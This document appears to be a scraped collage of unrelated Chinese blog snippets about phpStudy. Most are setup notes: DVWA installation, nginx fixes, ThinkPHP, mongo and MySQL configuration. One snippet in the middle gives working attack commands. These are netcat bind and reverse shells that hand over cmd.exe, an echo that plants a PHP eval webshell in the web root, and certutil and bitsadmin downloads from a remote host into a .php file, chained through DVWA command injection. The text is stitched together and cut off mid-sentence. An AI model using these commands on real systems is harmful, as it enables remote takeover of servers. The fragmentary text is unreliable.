phpstudy

DVWA的搭建 一、DVWA是什么？ 一款渗透测试演练系统，俗称靶机。 二、如何搭建？ Linux有成套的靶机，直接打开使用就可以，下面开始介绍Windows 下DVWA的搭建。 运行phpstudy 设置网站根目录 将DVWA源码放入 进入DVWA->config 修改你的数据库连接账户和密码， 启动phpstudy 通过网站访问 搭建完毕 来源： https://www.cnblogs.com/bryen/p/11437723.html

0x01 简介 执行PHP文件时，可以通过文件包含函数加载另一个文件，当服务器开启allow_url_include选项时，就可以通过php的某些特性函数，利用url去动态包含文件并解析执行，这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时，您只更新一个包含文件就可以了，或者当您向网站添加一张新页面时，仅仅需要修改一下菜单文件（而不是更新所有网页中的链接）。但是，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞，远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项（选项开启之后，服务器允许包含一个远程的文件）。 0x02 文件包含相关函数 include()， require() include_once() require_once() include和require区别主要是，include在包含的过程中如果出现错误，会抛出一个警告，程序继续正常运行；而require函数出现错误的时候，会直接报错并退出程序的执行。 而include_once()，require_once()这两个函数，与前两个的不同之处在于这两个函数只包含一次，适用于在脚本执行期间同一个文件有可能被包括超过一次的情况下，你想确保它只被包括一次以避免函数重定义

我本地是window系统，用的是phpstudy，解决办法：用phpstudy点击其他选项菜单->打开配置文件->选择vhost-ini（或者找到nginx安装目录，打开vhost.conf），在你的站点配置里 location / { 　　index index.html index.htm index.php; 　　#autoindex on; } 改为 location / { 　　index index.html index.htm index.php; 　　try_files $uri $uri/ /index.php?$query_string; 　　if (!-e $request_filename){ 　　　　rewrite ^/(.*) /index.php last; 　　} 　　#autoindex on; } 最后重启nginx，就搞定了。 来源： https://www.cnblogs.com/xiesx/p/11375779.html

文章目录 1.thinkphp5入口文件简介 2.访问网站根目录www （1）localhost访问网站根目录www （2）配置域名访问网站根目录www 第一步：点击站点域名管理 第二步：站点域名设置 第三步：查看域名是否配置成功 第四步：配置hosts 第四步：浏览器运行，检验是否配置成功 OK，跑通啦！ 1.thinkphp5入口文件简介 谈到入口文件，我们首先得知道它是干什么的，对叭。 首先，ThinkPHP采用单一入口模式进行项目部署和访问，无论完成什么功能，一个应用都有一个统一（但不一定是唯一）的入口，thinkphp5的默认入口文件位于 public/index.php 。 应该说， 所有应用都是从入口文件开始的 ，并且不同应用的入口文件是类似的。 在整个应用的 生命周期 中， 第一步执行的就是入口文件 ，用户发起的请求都会经过应用的入口文件，通常是 public/index.php 文件。当然，你也可以更改或者增加新的入口文件。 默认入口文件 index.php 代码如下： // 应用入口文件 // 定义项目路径 define('APP_PATH', __DIR__ . '/../application/'); // 加载框架引导文件 require __DIR__ . '/../thinkphp/start.php'; 2.访问网站根目录www

正向连接 受害者 IP 是直接暴漏在公网的 或者你们同属于一个内网 受害者：nc.exe -vlp 1234 -e cmd.exe 攻击者 nc 192.168.1.1 1234 nc -lvvp 80 直接监听内网所有主机80端口 反向连接 受害者 A 出于内网状态 192.168.1.25 攻击者 B 出于内网-外网的服务器 202.12.178.22 受害者 nc.exe -e cmd.exe 攻击者ip 1234 攻击者 nc -vv -l -p 1234 C:\phpStudy\PHPTutorial\WWW\nc.exe C:\Windows\system32\cmd.exe echo ^<?php @eval($_POST['cmd']); ?^>^ >C:\phpStudy\WWW\123.php 远程下载文件 certutil.exe -urlcache -split -f https://www.hack.com/robots.txt C:\phpStudy\WWW\111.php bitsadmin /rawreturn /transfer down "http://192.168.1.115/robots.txt" "C:\phpStudy\WWW\111.php" 通过DVWA命令执行操作完成监听执行cmd 192.168.1.152|certutil

[nginx]nginx的一个奇葩问题 500 Internal Server Error 解决方案 nginx 一直报500 Internal Server Error 错误，配置是通过phpstudy2018站点域名管理生成的。 默认是 root "D:\php\phpstudy\PHPTutorial\WWW\foxphp"; 修改成这样就好了 root "D:\\php\\phpstudy\\PHPTutorial\\WWW\\foxphp"; 查找了很多资料，因为很奇葩，木有多少可供参考的，之前配置单斜杠一直木有问题，也找不到为毛产生的。有人说是地址问题，或许是单斜杠被当成转义符号了吧，那就再加一个，然后就没有然后了，php网站可以通过域名正常访问了。 好吧，nginx我确实没有系统的从头到尾学习，一般能有就好。个人愚见，遇见了奇葩问题就记录了下来进行分享，或许能够给别人带来帮助。 server { listen 80; server_name k.cn ; root "D:\\php\\phpstudy\PHPTutorial\\WWW\\kppw"; location / { index index.html index.htm index.php; #autoindex on; } location ~ \.php(.*)$ { fastcgi_pass 127.0

观察如下3个参数,即位数,ts/nts,vc9/vc11/……三条规则(一定要一一对应) 重要是，还要对应PHP的版本，我选的是5.6的对应的版本 去http://windows.php.net/downloads/pecl/releases/mongo 下载对应的mongodb的包 解压在里面找到对应的dll文件 复制到对应的PHP版本的ext目录中 在PHPstudy中其他菜单选项–>打开配置文件–>php-ini 在里面添加extension=php_mongo.dll 添加完成后，保存并退出php-ini 出现上图，就证明phpstudy扩展mongo成功 ------------------------------------------------------------------------------------------------------------------------------------------------------------- 如果没有成功 则去对应当前版本PHP的文件夹里复制以下3个文件 libeay32.dll、libsasl.dll 和 ssleay32.dll这3个文件到phpStudy\Apache\bin 如果提示，覆盖（替换），一律点否，以免后续报错。 再重启PHPstudy，并刷新PHPinfo页面查看，搜索mongo

一，phpstudy升级mysql到mysql8（新的phpstudy8已经是mysql8了） 1,下载mysql8 2,将原来的mysql文件夹重命名,并执行 mysqld --remove 3,将新的mysql8放进去并命名MySQL 4,编辑my.ini,如下供借鉴 # power by php中文网 2017 www.php.cn 官网下载最新版 [client] port=3306 [mysql] default-character-set=utf8 [mysqld] port=3306 basedir="D:/apps/phpstudy2018/PHPTutorial/MySQL/" datadir="D:/apps/phpstudy2018/PHPTutorial/MySQL/data/" character-set-server=utf8 default-storage-engine=INNODB default_authentication_plugin=mysql_native_password sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES character-set-server = utf8mb4 performance_schema_max_table_instances = 600 table

*===================创建数据库的库名和数据表==========================↓ 在phpStudy中点击MySQL管理器，双击phpMyAdmin，进入phpMyAdmin页面 登录 点击数据库：新建数据库输入数据库名称tiku选择数据库编码格式：utf8_general_ci点击创建点击新建数据库：tiku输入新建数据表的名字：tp_mianshiti输入要创建的字段数:3点击创建编辑字段信息:名字 输入id类型 选择MEDIUMINT索引 选择PRIMARY勾选A_I(自增)名字 输入wenti类型 选择TEXT名字 输入daan类型 选择TEXT存储引擎MyISAM点击保存*===================创建数据库的库名和数据表==========================↑ *========解压压缩包和创建admin文件夹里面的文件和文件夹=========↓ 把下载好: thinkphp_5.0.5_full.zip 解压到 thinkphp_5.0.5_full\"(E) 在D:\phpStudy\WWW下面，创建tikuku文件夹 把thinkphp_5.0.5_full里面的内容，全部复制到 D:\phpStudy\WWW\tikuku D:\phpStudy\WWW\tikuku\application 下

一定要备份原来 phpStudy 中 MySQL 安装目录 把下载的 MySQL 压缩文件解压至 phpStudy 下的 MySQL目录，复制 my-default.ini ，重命名为 my.ini。打开 my.ini，找到 #basedir 处编辑：（把原来的路径复制过来也可以） basedir=D:/phpStudy/MySQL datadir=D:/phpStudy/MySQL/data 把 MySQL 安装路径添加至系统环境变量 MySQL 的 bin 目录初始化数据库 mysqld --initialize 如果登录数据库报错 Access denied for user 'root'@'localhost' (using password: YES) 打开 my.ini，找到 [mysqld]，在下面添加： skip-grant-tables 修改密码update user set authentication_string=password('你要的密码') where user='root'; 来源： https://www.cnblogs.com/chentailin/p/11344325.html